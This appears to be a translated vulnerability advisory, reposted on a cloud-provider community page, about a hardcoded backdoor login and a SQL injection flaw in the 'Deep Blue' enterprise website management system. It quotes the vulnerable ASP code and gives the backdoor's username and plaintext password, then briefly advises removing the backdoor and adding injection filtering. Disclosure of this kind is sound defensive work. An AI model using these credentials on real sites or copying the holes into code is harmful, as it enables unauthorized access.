Deep Blue enterprise website management system SQL injection/unauthorized backdoor Login

Source: Internet
Author: User

Problem file: pro_addnews.asplogin.asp

The login. asp code is as follows:

If ytss_use <> "" And ytss_Pword <> "Thenif ytss_use =" lty696 "and md5 (ytss_Pword) =" ae68b0f59186f263 "thenSession (" admin_User ") = "lty" session ("admin_type") = "lty696" Response. redirect "tz_admin_index.asp" // very obvious backdoor. Username: lty696 password: 841122

 

The pro_addnews.asp code is as follows:
Id = trim (request. queryString ("id") if request. queryString ("action") = "modi" and id <> "" thendim modimodi = "y" set rsok = server. createobject ("adodb. recordset ") sqlok =" select * from product where id = "& cint (trim (request. queryString ("id") rsok. open sqlok, conn, // The ID is not filtered and directly submitted to the database for query, resulting in injection.

 

Solution:

Delete backdoor code and add anti-injection programs

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.